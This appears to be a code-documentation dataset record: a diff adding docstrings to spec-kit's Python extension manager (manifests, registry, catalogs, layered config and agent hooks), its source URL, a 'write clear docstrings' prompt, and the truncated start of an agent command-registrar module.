if match := re.match(r'env\.([A-Z0-9_]+)\s+is\s+set', condition, re.IGNORECASE):
var_name = match.group(1).upper()
return var_name in os.environ
# Pattern: "env.VAR_NAME == 'value'" or "env.VAR_NAME != 'value'"
if match := re.match(r'env\.([A-Z0-9_]+)\s*(==|!=)\s*["\']([^"\']+)["\']', condition, re.IGNORECASE):
var_name = match.group(1).upper()
operator = match.group(2)
expected_value = match.group(3)
actual_value = os.environ.get(var_name, "")
if operator == "==":
return actual_value == expected_value
else: # !=
return actual_value != expected_value
# Unknown condition format, default to False for safety
return False
def format_hook_message(
self, event_name: str, hooks: List[Dict[str, Any]]
) -> str:
if not hooks:
return ""
lines = ["\n## Extension Hooks\n"]
lines.append(f"Hooks available for event '{event_name}':\n")
for hook in hooks:
extension = hook.get("extension")
command = hook.get("command")
optional = hook.get("optional", True)
prompt = hook.get("prompt", "")
description = hook.get("description", "")
if optional:
lines.append(f"\n**Optional Hook**: {extension}")
lines.append(f"Command: `/{command}`")
if description:
lines.append(f"Description: {description}")
lines.append(f"\nPrompt: {prompt}")
lines.append(f"To execute: `/{command}`")
else:
lines.append(f"\n**Automatic Hook**: {extension}")
lines.append(f"Executing: `/{command}`")
lines.append(f"EXECUTE_COMMAND: {command}")
return "\n".join(lines)
def check_hooks_for_event(self, event_name: str) -> Dict[str, Any]:
hooks = self.get_hooks_for_event(event_name)
if not hooks:
return {
"has_hooks": False,
"hooks": [],
"message": ""
}
# Filter hooks by condition
executable_hooks = []
for hook in hooks:
if self.should_execute_hook(hook):
executable_hooks.append(hook)
if not executable_hooks:
return {
"has_hooks": False,
"hooks": [],
"message": f"# No executable hooks for event '{event_name}' (conditions not met)"
}
return {
"has_hooks": True,
"hooks": executable_hooks,
"message": self.format_hook_message(event_name, executable_hooks)
}
def execute_hook(self, hook: Dict[str, Any]) -> Dict[str, Any]:
return {
"command": hook.get("command"),
"extension": hook.get("extension"),
"optional": hook.get("optional", True),
"description": hook.get("description", ""),
"prompt": hook.get("prompt", "")
}
def enable_hooks(self, extension_id: str):
config = self.get_project_config()
if "hooks" not in config:
return
# Enable all hooks for this extension
for hook_name in config["hooks"]:
for hook in config["hooks"][hook_name]:
if hook.get("extension") == extension_id:
hook["enabled"] = True
self.save_project_config(config)
def disable_hooks(self, extension_id: str):
config = self.get_project_config()
if "hooks" not in config:
return
# Disable all hooks for this extension
for hook_name in config["hooks"]:
for hook in config["hooks"][hook_name]:
if hook.get("extension") == extension_id:
hook["enabled"] = False
self.save_project_config(config)
| --- +++ @@ -1,3 +1,10 @@+"""
+Extension Manager for Spec Kit
+
+Handles installation, removal, and management of Spec Kit extensions.
+Extensions are modular packages that add commands and functionality to spec-kit
+without bloating the core framework.
+"""
import json
import hashlib
@@ -20,18 +27,33 @@
class ExtensionError(Exception):
+ """Base exception for extension-related errors."""
pass
class ValidationError(ExtensionError):
+ """Raised when extension manifest validation fails."""
pass
class CompatibilityError(ExtensionError):
+ """Raised when extension is incompatible with current environment."""
pass
def normalize_priority(value: Any, default: int = 10) -> int:
+ """Normalize a stored priority value for sorting and display.
+
+ Corrupted registry data may contain missing, non-numeric, or non-positive
+ values. In those cases, fall back to the default priority.
+
+ Args:
+ value: Priority value to normalize (may be int, str, None, etc.)
+ default: Default priority to use for invalid values (default: 10)
+
+ Returns:
+ Normalized priority as positive integer (>= 1)
+ """
try:
priority = int(value)
except (TypeError, ValueError):
@@ -41,6 +63,7 @@
@dataclass
class CatalogEntry:
+ """Represents a single catalog entry in the catalog stack."""
url: str
name: str
priority: int
@@ -49,16 +72,26 @@
class ExtensionManifest:
+ """Represents and validates an extension manifest (extension.yml)."""
SCHEMA_VERSION = "1.0"
REQUIRED_FIELDS = ["schema_version", "extension", "requires", "provides"]
def __init__(self, manifest_path: Path):
+ """Load and validate extension manifest.
+
+ Args:
+ manifest_path: Path to extension.yml file
+
+ Raises:
+ ValidationError: If manifest is invalid
+ """
self.path = manifest_path
self.data = self._load_yaml(manifest_path)
self._validate()
def _load_yaml(self, path: Path) -> dict:
+ """Load YAML file safely."""
try:
with open(path, 'r') as f:
return yaml.safe_load(f) or {}
@@ -68,6 +101,7 @@ raise ValidationError(f"Manifest not found: {path}")
def _validate(self):
+ """Validate manifest structure and required fields."""
# Check required top-level fields
for field in self.REQUIRED_FIELDS:
if field not in self.data:
@@ -123,48 +157,63 @@
@property
def id(self) -> str:
+ """Get extension ID."""
return self.data["extension"]["id"]
@property
def name(self) -> str:
+ """Get extension name."""
return self.data["extension"]["name"]
@property
def version(self) -> str:
+ """Get extension version."""
return self.data["extension"]["version"]
@property
def description(self) -> str:
+ """Get extension description."""
return self.data["extension"]["description"]
@property
def requires_speckit_version(self) -> str:
+ """Get required spec-kit version range."""
return self.data["requires"]["speckit_version"]
@property
def commands(self) -> List[Dict[str, Any]]:
+ """Get list of provided commands."""
return self.data["provides"]["commands"]
@property
def hooks(self) -> Dict[str, Any]:
+ """Get hook definitions."""
return self.data.get("hooks", {})
def get_hash(self) -> str:
+ """Calculate SHA256 hash of manifest file."""
with open(self.path, 'rb') as f:
return f"sha256:{hashlib.sha256(f.read()).hexdigest()}"
class ExtensionRegistry:
+ """Manages the registry of installed extensions."""
REGISTRY_FILE = ".registry"
SCHEMA_VERSION = "1.0"
def __init__(self, extensions_dir: Path):
+ """Initialize registry.
+
+ Args:
+ extensions_dir: Path to .specify/extensions/ directory
+ """
self.extensions_dir = extensions_dir
self.registry_path = extensions_dir / self.REGISTRY_FILE
self.data = self._load()
def _load(self) -> dict:
+ """Load registry from disk."""
if not self.registry_path.exists():
return {
"schema_version": self.SCHEMA_VERSION,
@@ -182,11 +231,18 @@ }
def _save(self):
+ """Save registry to disk."""
self.extensions_dir.mkdir(parents=True, exist_ok=True)
with open(self.registry_path, 'w') as f:
json.dump(self.data, f, indent=2)
def add(self, extension_id: str, metadata: dict):
+ """Add extension to registry.
+
+ Args:
+ extension_id: Extension ID
+ metadata: Extension metadata (version, source, etc.)
+ """
self.data["extensions"][extension_id] = {
**metadata,
"installed_at": datetime.now(timezone.utc).isoformat()
@@ -194,6 +250,23 @@ self._save()
def update(self, extension_id: str, metadata: dict):
+ """Update extension metadata in registry, merging with existing entry.
+
+ Merges the provided metadata with the existing entry, preserving any
+ fields not specified in the new metadata. The installed_at timestamp
+ is always preserved from the original entry.
+
+ Use this method instead of add() when updating existing extension
+ metadata (e.g., enabling/disabling) to preserve the original
+ installation timestamp and other existing fields.
+
+ Args:
+ extension_id: Extension ID
+ metadata: Extension metadata fields to update (merged with existing)
+
+ Raises:
+ KeyError: If extension is not installed
+ """
if extension_id not in self.data["extensions"]:
raise KeyError(f"Extension '{extension_id}' is not installed")
# Merge new metadata with existing, preserving original installed_at
@@ -214,25 +287,77 @@ self._save()
def restore(self, extension_id: str, metadata: dict):
+ """Restore extension metadata to registry without modifying timestamps.
+
+ Use this method for rollback scenarios where you have a complete backup
+ of the registry entry (including installed_at) and want to restore it
+ exactly as it was.
+
+ Args:
+ extension_id: Extension ID
+ metadata: Complete extension metadata including installed_at
+ """
self.data["extensions"][extension_id] = dict(metadata)
self._save()
def remove(self, extension_id: str):
+ """Remove extension from registry.
+
+ Args:
+ extension_id: Extension ID
+ """
if extension_id in self.data["extensions"]:
del self.data["extensions"][extension_id]
self._save()
def get(self, extension_id: str) -> Optional[dict]:
+ """Get extension metadata from registry.
+
+ Returns a deep copy to prevent callers from accidentally mutating
+ nested internal registry state without going through the write path.
+
+ Args:
+ extension_id: Extension ID
+
+ Returns:
+ Deep copy of extension metadata, or None if not found
+ """
entry = self.data["extensions"].get(extension_id)
return copy.deepcopy(entry) if entry is not None else None
def list(self) -> Dict[str, dict]:
+ """Get all installed extensions.
+
+ Returns a deep copy of the extensions mapping to prevent callers
+ from accidentally mutating nested internal registry state.
+
+ Returns:
+ Dictionary of extension_id -> metadata (deep copies)
+ """
return copy.deepcopy(self.data["extensions"])
def is_installed(self, extension_id: str) -> bool:
+ """Check if extension is installed.
+
+ Args:
+ extension_id: Extension ID
+
+ Returns:
+ True if extension is installed
+ """
return extension_id in self.data["extensions"]
def list_by_priority(self) -> List[tuple]:
+ """Get all installed extensions sorted by priority.
+
+ Lower priority number = higher precedence (checked first).
+ Extensions with equal priority are sorted alphabetically by ID
+ for deterministic ordering.
+
+ Returns:
+ List of (extension_id, metadata_copy) tuples sorted by priority.
+ Metadata is deep-copied to prevent accidental mutation.
+ """
extensions = self.data.get("extensions", {}) or {}
if not isinstance(extensions, dict):
extensions = {}
@@ -250,14 +375,41 @@
class ExtensionManager:
+ """Manages extension lifecycle: installation, removal, updates."""
def __init__(self, project_root: Path):
+ """Initialize extension manager.
+
+ Args:
+ project_root: Path to project root directory
+ """
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.registry = ExtensionRegistry(self.extensions_dir)
@staticmethod
def _load_extensionignore(source_dir: Path) -> Optional[Callable[[str, List[str]], Set[str]]]:
+ """Load .extensionignore and return an ignore function for shutil.copytree.
+
+ The .extensionignore file uses .gitignore-compatible patterns (one per line).
+ Lines starting with '#' are comments. Blank lines are ignored.
+ The .extensionignore file itself is always excluded.
+
+ Pattern semantics mirror .gitignore:
+ - '*' matches anything except '/'
+ - '**' matches zero or more directories
+ - '?' matches any single character except '/'
+ - Trailing '/' restricts a pattern to directories only
+ - Patterns with '/' (other than trailing) are anchored to the root
+ - '!' negates a previously excluded pattern
+
+ Args:
+ source_dir: Path to the extension source directory
+
+ Returns:
+ An ignore function compatible with shutil.copytree, or None
+ if no .extensionignore file exists.
+ """
ignore_file = source_dir / ".extensionignore"
if not ignore_file.exists():
return None
@@ -304,6 +456,18 @@ manifest: ExtensionManifest,
speckit_version: str
) -> bool:
+ """Check if extension is compatible with current spec-kit version.
+
+ Args:
+ manifest: Extension manifest
+ speckit_version: Current spec-kit version
+
+ Returns:
+ True if compatible
+
+ Raises:
+ CompatibilityError: If extension is incompatible
+ """
required = manifest.requires_speckit_version
current = pkg_version.Version(speckit_version)
@@ -328,6 +492,21 @@ register_commands: bool = True,
priority: int = 10,
) -> ExtensionManifest:
+ """Install extension from a local directory.
+
+ Args:
+ source_dir: Path to extension directory
+ speckit_version: Current spec-kit version
+ register_commands: If True, register commands with AI agents
+ priority: Resolution priority (lower = higher precedence, default 10)
+
+ Returns:
+ Installed extension manifest
+
+ Raises:
+ ValidationError: If manifest is invalid or priority is invalid
+ CompatibilityError: If extension is incompatible
+ """
# Validate priority
if priority < 1:
raise ValidationError("Priority must be a positive integer (1 or higher)")
@@ -385,6 +564,20 @@ speckit_version: str,
priority: int = 10,
) -> ExtensionManifest:
+ """Install extension from ZIP file.
+
+ Args:
+ zip_path: Path to extension ZIP file
+ speckit_version: Current spec-kit version
+ priority: Resolution priority (lower = higher precedence, default 10)
+
+ Returns:
+ Installed extension manifest
+
+ Raises:
+ ValidationError: If manifest is invalid or priority is invalid
+ CompatibilityError: If extension is incompatible
+ """
# Validate priority early
if priority < 1:
raise ValidationError("Priority must be a positive integer (1 or higher)")
@@ -426,6 +619,15 @@ return self.install_from_directory(extension_dir, speckit_version, priority=priority)
def remove(self, extension_id: str, keep_config: bool = False) -> bool:
+ """Remove an installed extension.
+
+ Args:
+ extension_id: Extension ID
+ keep_config: If True, preserve config files (don't delete extension dir)
+
+ Returns:
+ True if extension was removed
+ """
if not self.registry.is_installed(extension_id):
return False
@@ -484,6 +686,11 @@ return True
def list_installed(self) -> List[Dict[str, Any]]:
+ """List all installed extensions with metadata.
+
+ Returns:
+ List of extension metadata dictionaries
+ """
result = []
for ext_id, metadata in self.registry.list().items():
@@ -523,6 +730,14 @@ return result
def get_extension(self, extension_id: str) -> Optional[ExtensionManifest]:
+ """Get manifest for an installed extension.
+
+ Args:
+ extension_id: Extension ID
+
+ Returns:
+ Extension manifest or None if not installed
+ """
if not self.registry.is_installed(extension_id):
return None
@@ -536,6 +751,15 @@
def version_satisfies(current: str, required: str) -> bool:
+ """Check if current version satisfies required version specifier.
+
+ Args:
+ current: Current version (e.g., "0.1.5")
+ required: Required version specifier (e.g., ">=0.1.0,<2.0.0")
+
+ Returns:
+ True if version satisfies requirement
+ """
try:
current_ver = pkg_version.Version(current)
specifier = SpecifierSet(required)
@@ -545,6 +769,12 @@
class CommandRegistrar:
+ """Handles registration of extension commands with AI agents.
+
+ This is a backward-compatible wrapper around the shared CommandRegistrar
+ in agents.py. Extension-specific methods accept ExtensionManifest objects
+ and delegate to the generic API.
+ """
# Re-export AGENT_CONFIGS at class level for direct attribute access
from .agents import CommandRegistrar as _AgentRegistrar
@@ -588,6 +818,7 @@ extension_dir: Path,
project_root: Path
) -> List[str]:
+ """Register extension commands for a specific agent."""
if agent_name not in self.AGENT_CONFIGS:
raise ExtensionError(f"Unsupported agent: {agent_name}")
context_note = f"\n<!-- Extension: {manifest.id} -->\n<!-- Config: .specify/extensions/{manifest.id}/ -->\n"
@@ -602,6 +833,7 @@ extension_dir: Path,
project_root: Path
) -> Dict[str, List[str]]:
+ """Register extension commands for all detected agents."""
context_note = f"\n<!-- Extension: {manifest.id} -->\n<!-- Config: .specify/extensions/{manifest.id}/ -->\n"
return self._registrar.register_commands_for_all_agents(
manifest.commands, manifest.id, extension_dir, project_root,
@@ -613,6 +845,7 @@ registered_commands: Dict[str, List[str]],
project_root: Path
) -> None:
+ """Remove previously registered command files from agent directories."""
self._registrar.unregister_commands(registered_commands, project_root)
def register_commands_for_claude(
@@ -621,16 +854,23 @@ extension_dir: Path,
project_root: Path
) -> List[str]:
+ """Register extension commands for Claude Code agent."""
return self.register_commands_for_agent("claude", manifest, extension_dir, project_root)
class ExtensionCatalog:
+ """Manages extension catalog fetching, caching, and searching."""
DEFAULT_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/extensions/catalog.json"
COMMUNITY_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/extensions/catalog.community.json"
CACHE_DURATION = 3600 # 1 hour in seconds
def __init__(self, project_root: Path):
+ """Initialize extension catalog manager.
+
+ Args:
+ project_root: Root directory of the spec-kit project
+ """
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.cache_dir = self.extensions_dir / ".cache"
@@ -638,6 +878,14 @@ self.cache_metadata_file = self.cache_dir / "catalog-metadata.json"
def _validate_catalog_url(self, url: str) -> None:
+ """Validate that a catalog URL uses HTTPS (localhost HTTP allowed).
+
+ Args:
+ url: URL to validate
+
+ Raises:
+ ValidationError: If URL is invalid or uses non-HTTPS scheme
+ """
from urllib.parse import urlparse
parsed = urlparse(url)
@@ -651,6 +899,20 @@ raise ValidationError("Catalog URL must be a valid URL with a host.")
def _load_catalog_config(self, config_path: Path) -> Optional[List[CatalogEntry]]:
+ """Load catalog stack configuration from a YAML file.
+
+ Args:
+ config_path: Path to extension-catalogs.yml
+
+ Returns:
+ Ordered list of CatalogEntry objects, or None if file doesn't exist.
+
+ Raises:
+ ValidationError: If any catalog entry has an invalid URL,
+ the file cannot be parsed, a priority value is invalid,
+ or the file exists but contains no valid catalog entries
+ (fail-closed for security).
+ """
if not config_path.exists():
return None
try:
@@ -712,6 +974,20 @@ return entries
def get_active_catalogs(self) -> List[CatalogEntry]:
+ """Get the ordered list of active catalogs.
+
+ Resolution order:
+ 1. SPECKIT_CATALOG_URL env var — single catalog replacing all defaults
+ 2. Project-level .specify/extension-catalogs.yml
+ 3. User-level ~/.specify/extension-catalogs.yml
+ 4. Built-in default stack (default + community)
+
+ Returns:
+ List of CatalogEntry objects sorted by priority (ascending)
+
+ Raises:
+ ValidationError: If a catalog URL is invalid
+ """
import sys
# 1. SPECKIT_CATALOG_URL env var replaces all defaults for backward compat
@@ -747,10 +1023,37 @@ ]
def get_catalog_url(self) -> str:
+ """Get the primary catalog URL.
+
+ Returns the URL of the highest-priority catalog. Kept for backward
+ compatibility. Use get_active_catalogs() for full multi-catalog support.
+
+ Returns:
+ URL of the primary catalog
+
+ Raises:
+ ValidationError: If a catalog URL is invalid
+ """
active = self.get_active_catalogs()
return active[0].url if active else self.DEFAULT_CATALOG_URL
def _fetch_single_catalog(self, entry: CatalogEntry, force_refresh: bool = False) -> Dict[str, Any]:
+ """Fetch a single catalog with per-URL caching.
+
+ For the DEFAULT_CATALOG_URL, uses legacy cache files (self.cache_file /
+ self.cache_metadata_file) for backward compatibility. For all other URLs,
+ uses URL-hash-based cache files in self.cache_dir.
+
+ Args:
+ entry: CatalogEntry describing the catalog to fetch
+ force_refresh: If True, bypass cache
+
+ Returns:
+ Catalog data dictionary
+
+ Raises:
+ ExtensionError: If catalog cannot be fetched or has invalid format
+ """
import urllib.request
import urllib.error
@@ -807,6 +1110,25 @@ raise ExtensionError(f"Invalid JSON in catalog from {entry.url}: {e}")
def _get_merged_extensions(self, force_refresh: bool = False) -> List[Dict[str, Any]]:
+ """Fetch and merge extensions from all active catalogs.
+
+ Higher-priority (lower priority number) catalogs win on conflicts
+ (same extension id in two catalogs). Each extension dict is annotated with:
+ - _catalog_name: name of the source catalog
+ - _install_allowed: whether installation is allowed from this catalog
+
+ Catalogs that fail to fetch are skipped. Raises ExtensionError only if
+ ALL catalogs fail.
+
+ Args:
+ force_refresh: If True, bypass all caches
+
+ Returns:
+ List of merged extension dicts
+
+ Raises:
+ ExtensionError: If all catalogs fail to fetch
+ """
import sys
active_catalogs = self.get_active_catalogs()
@@ -839,6 +1161,11 @@ return list(merged.values())
def is_cache_valid(self) -> bool:
+ """Check if cached catalog is still valid.
+
+ Returns:
+ True if cache exists and is within cache duration
+ """
if not self.cache_file.exists() or not self.cache_metadata_file.exists():
return False
@@ -853,6 +1180,17 @@ return False
def fetch_catalog(self, force_refresh: bool = False) -> Dict[str, Any]:
+ """Fetch extension catalog from URL or cache.
+
+ Args:
+ force_refresh: If True, bypass cache and fetch from network
+
+ Returns:
+ Catalog data dictionary
+
+ Raises:
+ ExtensionError: If catalog cannot be fetched
+ """
# Check cache first unless force refresh
if not force_refresh and self.is_cache_valid():
try:
@@ -899,6 +1237,18 @@ author: Optional[str] = None,
verified_only: bool = False,
) -> List[Dict[str, Any]]:
+ """Search catalog for extensions across all active catalogs.
+
+ Args:
+ query: Search query (searches name, description, tags)
+ tag: Filter by specific tag
+ author: Filter by author name
+ verified_only: If True, show only verified extensions
+
+ Returns:
+ List of matching extension metadata, each annotated with
+ ``_catalog_name`` and ``_install_allowed`` from its source catalog.
+ """
all_extensions = self._get_merged_extensions()
results = []
@@ -936,6 +1286,17 @@ return results
def get_extension_info(self, extension_id: str) -> Optional[Dict[str, Any]]:
+ """Get detailed information about a specific extension.
+
+ Searches all active catalogs in priority order.
+
+ Args:
+ extension_id: ID of the extension
+
+ Returns:
+ Extension metadata (annotated with ``_catalog_name`` and
+ ``_install_allowed``) or None if not found.
+ """
all_extensions = self._get_merged_extensions()
for ext_data in all_extensions:
if ext_data["id"] == extension_id:
@@ -943,6 +1304,18 @@ return None
def download_extension(self, extension_id: str, target_dir: Optional[Path] = None) -> Path:
+ """Download extension ZIP from catalog.
+
+ Args:
+ extension_id: ID of the extension to download
+ target_dir: Directory to save ZIP file (defaults to temp directory)
+
+ Returns:
+ Path to downloaded ZIP file
+
+ Raises:
+ ExtensionError: If extension not found or download fails
+ """
import urllib.request
import urllib.error
@@ -987,6 +1360,7 @@ raise ExtensionError(f"Failed to save extension ZIP: {e}")
def clear_cache(self):
+ """Clear the catalog cache (both legacy and URL-hash-based files)."""
if self.cache_file.exists():
self.cache_file.unlink()
if self.cache_metadata_file.exists():
@@ -1001,13 +1375,35 @@
class ConfigManager:
+ """Manages layered configuration for extensions.
+
+ Configuration layers (in order of precedence from lowest to highest):
+ 1. Defaults (from extension.yml)
+ 2. Project config (.specify/extensions/{ext-id}/{ext-id}-config.yml)
+ 3. Local config (.specify/extensions/{ext-id}/local-config.yml) - gitignored
+ 4. Environment variables (SPECKIT_{EXT_ID}_{KEY})
+ """
def __init__(self, project_root: Path, extension_id: str):
+ """Initialize config manager for an extension.
+
+ Args:
+ project_root: Root directory of the spec-kit project
+ extension_id: ID of the extension
+ """
self.project_root = project_root
self.extension_id = extension_id
self.extension_dir = project_root / ".specify" / "extensions" / extension_id
def _load_yaml_config(self, file_path: Path) -> Dict[str, Any]:
+ """Load configuration from YAML file.
+
+ Args:
+ file_path: Path to YAML file
+
+ Returns:
+ Configuration dictionary
+ """
if not file_path.exists():
return {}
@@ -1017,6 +1413,11 @@ return {}
def _get_extension_defaults(self) -> Dict[str, Any]:
+ """Get default configuration from extension manifest.
+
+ Returns:
+ Default configuration dictionary
+ """
manifest_path = self.extension_dir / "extension.yml"
if not manifest_path.exists():
return {}
@@ -1025,14 +1426,36 @@ return manifest_data.get("config", {}).get("defaults", {})
def _get_project_config(self) -> Dict[str, Any]:
+ """Get project-level configuration.
+
+ Returns:
+ Project configuration dictionary
+ """
config_file = self.extension_dir / f"{self.extension_id}-config.yml"
return self._load_yaml_config(config_file)
def _get_local_config(self) -> Dict[str, Any]:
+ """Get local configuration (gitignored, machine-specific).
+
+ Returns:
+ Local configuration dictionary
+ """
config_file = self.extension_dir / "local-config.yml"
return self._load_yaml_config(config_file)
def _get_env_config(self) -> Dict[str, Any]:
+ """Get configuration from environment variables.
+
+ Environment variables follow the pattern:
+ SPECKIT_{EXT_ID}_{SECTION}_{KEY}
+
+ For example:
+ - SPECKIT_JIRA_CONNECTION_URL
+ - SPECKIT_JIRA_PROJECT_KEY
+
+ Returns:
+ Configuration dictionary from environment variables
+ """
import os
env_config = {}
@@ -1059,6 +1482,15 @@ return env_config
def _merge_configs(self, base: Dict[str, Any], override: Dict[str, Any]) -> Dict[str, Any]:
+ """Recursively merge two configuration dictionaries.
+
+ Args:
+ base: Base configuration
+ override: Configuration to merge on top
+
+ Returns:
+ Merged configuration
+ """
result = base.copy()
for key, value in override.items():
@@ -1072,6 +1504,14 @@ return result
def get_config(self) -> Dict[str, Any]:
+ """Get final merged configuration for the extension.
+
+ Merges configuration layers in order:
+ defaults -> project -> local -> env
+
+ Returns:
+ Final merged configuration dictionary
+ """
# Start with defaults
config = self._get_extension_defaults()
@@ -1087,6 +1527,20 @@ return config
def get_value(self, key_path: str, default: Any = None) -> Any:
+ """Get a specific configuration value by dot-notation path.
+
+ Args:
+ key_path: Dot-separated path to config value (e.g., "connection.url")
+ default: Default value if key not found
+
+ Returns:
+ Configuration value or default
+
+ Example:
+ >>> config = ConfigManager(project_root, "jira")
+ >>> url = config.get_value("connection.url")
+ >>> timeout = config.get_value("connection.timeout", 30)
+ """
config = self.get_config()
keys = key_path.split(".")
@@ -1099,6 +1553,14 @@ return current
def has_value(self, key_path: str) -> bool:
+ """Check if a configuration value exists.
+
+ Args:
+ key_path: Dot-separated path to config value
+
+ Returns:
+ True if value exists (even if None), False otherwise
+ """
config = self.get_config()
keys = key_path.split(".")
@@ -1112,13 +1574,24 @@
class HookExecutor:
+ """Manages extension hook execution."""
def __init__(self, project_root: Path):
+ """Initialize hook executor.
+
+ Args:
+ project_root: Root directory of the spec-kit project
+ """
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.config_file = project_root / ".specify" / "extensions.yml"
def get_project_config(self) -> Dict[str, Any]:
+ """Load project-level extension configuration.
+
+ Returns:
+ Extension configuration dictionary
+ """
if not self.config_file.exists():
return {
"installed": [],
@@ -1136,12 +1609,22 @@ }
def save_project_config(self, config: Dict[str, Any]):
+ """Save project-level extension configuration.
+
+ Args:
+ config: Configuration dictionary to save
+ """
self.config_file.parent.mkdir(parents=True, exist_ok=True)
self.config_file.write_text(
yaml.dump(config, default_flow_style=False, sort_keys=False)
)
def register_hooks(self, manifest: ExtensionManifest):
+ """Register extension hooks in project config.
+
+ Args:
+ manifest: Extension manifest with hooks to register
+ """
if not hasattr(manifest, "hooks") or not manifest.hooks:
return
@@ -1187,6 +1670,11 @@ self.save_project_config(config)
def unregister_hooks(self, extension_id: str):
+ """Remove extension hooks from project config.
+
+ Args:
+ extension_id: ID of extension to unregister
+ """
config = self.get_project_config()
if "hooks" not in config:
@@ -1208,6 +1696,14 @@ self.save_project_config(config)
def get_hooks_for_event(self, event_name: str) -> List[Dict[str, Any]]:
+ """Get all registered hooks for a specific event.
+
+ Args:
+ event_name: Name of the event (e.g., 'after_tasks')
+
+ Returns:
+ List of hook configurations
+ """
config = self.get_project_config()
hooks = config.get("hooks", {}).get(event_name, [])
@@ -1215,6 +1711,14 @@ return [h for h in hooks if h.get("enabled", True)]
def should_execute_hook(self, hook: Dict[str, Any]) -> bool:
+ """Determine if a hook should be executed based on its condition.
+
+ Args:
+ hook: Hook configuration
+
+ Returns:
+ True if hook should execute, False otherwise
+ """
condition = hook.get("condition")
if not condition:
@@ -1228,6 +1732,22 @@ return False
def _evaluate_condition(self, condition: str, extension_id: Optional[str]) -> bool:
+ """Evaluate a hook condition expression.
+
+ Supported condition patterns:
+ - "config.key.path is set" - checks if config value exists
+ - "config.key.path == 'value'" - checks if config equals value
+ - "config.key.path != 'value'" - checks if config not equals value
+ - "env.VAR_NAME is set" - checks if environment variable exists
+ - "env.VAR_NAME == 'value'" - checks if env var equals value
+
+ Args:
+ condition: Condition expression string
+ extension_id: Extension ID for config lookup
+
+ Returns:
+ True if condition is met, False otherwise
+ """
import os
condition = condition.strip()
@@ -1289,6 +1809,15 @@ def format_hook_message(
self, event_name: str, hooks: List[Dict[str, Any]]
) -> str:
+ """Format hook execution message for display in command output.
+
+ Args:
+ event_name: Name of the event
+ hooks: List of hooks to execute
+
+ Returns:
+ Formatted message string
+ """
if not hooks:
return ""
@@ -1317,6 +1846,19 @@ return "\n".join(lines)
def check_hooks_for_event(self, event_name: str) -> Dict[str, Any]:
+ """Check for hooks registered for a specific event.
+
+ This method is designed to be called by AI agents after core commands complete.
+
+ Args:
+ event_name: Name of the event (e.g., 'after_spec', 'after_tasks')
+
+ Returns:
+ Dictionary with hook information:
+ - has_hooks: bool - Whether hooks exist for this event
+ - hooks: List[Dict] - List of hooks (with condition evaluation applied)
+ - message: str - Formatted message for display
+ """
hooks = self.get_hooks_for_event(event_name)
if not hooks:
@@ -1346,6 +1888,21 @@ }
def execute_hook(self, hook: Dict[str, Any]) -> Dict[str, Any]:
+ """Execute a single hook command.
+
+ Note: This returns information about how to execute the hook.
+ The actual execution is delegated to the AI agent.
+
+ Args:
+ hook: Hook configuration
+
+ Returns:
+ Dictionary with execution information:
+ - command: str - Command to execute
+ - extension: str - Extension ID
+ - optional: bool - Whether hook is optional
+ - description: str - Hook description
+ """
return {
"command": hook.get("command"),
"extension": hook.get("extension"),
@@ -1355,6 +1912,11 @@ }
def enable_hooks(self, extension_id: str):
+ """Enable all hooks for an extension.
+
+ Args:
+ extension_id: Extension ID
+ """
config = self.get_project_config()
if "hooks" not in config:
@@ -1369,6 +1931,11 @@ self.save_project_config(config)
def disable_hooks(self, extension_id: str):
+ """Disable all hooks for an extension.
+
+ Args:
+ extension_id: Extension ID
+ """
config = self.get_project_config()
if "hooks" not in config:
@@ -1381,3 +1948,4 @@ hook["enabled"] = False
self.save_project_config(config)
+
| https://raw.githubusercontent.com/github/spec-kit/HEAD/src/specify_cli/extensions.py |
Help me write clear docstrings |
from pathlib import Path
from typing import Dict, List, Any
import yaml
class CommandRegistrar:
# Agent configurations with directory, format, and argument placeholder
AGENT_CONFIGS = {
"claude": {
"dir": ".claude/commands",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"gemini": {
"dir": ".gemini/commands",
"format": "toml",
"args": "{{args}}",
"extension": ".toml"
},
"copilot": {
"dir": ".github/agents",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".agent.md"
},
"cursor": {
"dir": ".cursor/commands",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"qwen": {
"dir": ".qwen/commands",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"opencode": {
"dir": ".opencode/command",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"codex": {
"dir": ".codex/prompts",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"windsurf": {
"dir": ".windsurf/workflows",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"kilocode": {
"dir": ".kilocode/workflows",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"auggie": {
"dir": ".augment/commands",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"roo": {
"dir": ".roo/commands",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"codebuddy": {
"dir": ".codebuddy/commands",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"qodercli": {
"dir": ".qoder/commands",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"kiro-cli": {
"dir": ".kiro/prompts",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"pi": {
"dir": ".pi/prompts",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"amp": {
"dir": ".agents/commands",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"shai": {
"dir": ".shai/commands",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"tabnine": {
"dir": ".tabnine/agent/commands",
"format": "toml",
"args": "{{args}}",
"extension": ".toml"
},
"bob": {
"dir": ".bob/commands",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
},
"kimi": {
"dir": ".kimi/skills",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": "/SKILL.md"
},
"trae": {
"dir": ".trae/rules",
"format": "markdown",
"args": "$ARGUMENTS",
"extension": ".md"
}
}
@staticmethod
def parse_frontmatter(content: str) -> tuple[dict, str]:
if not content.startswith("---"):
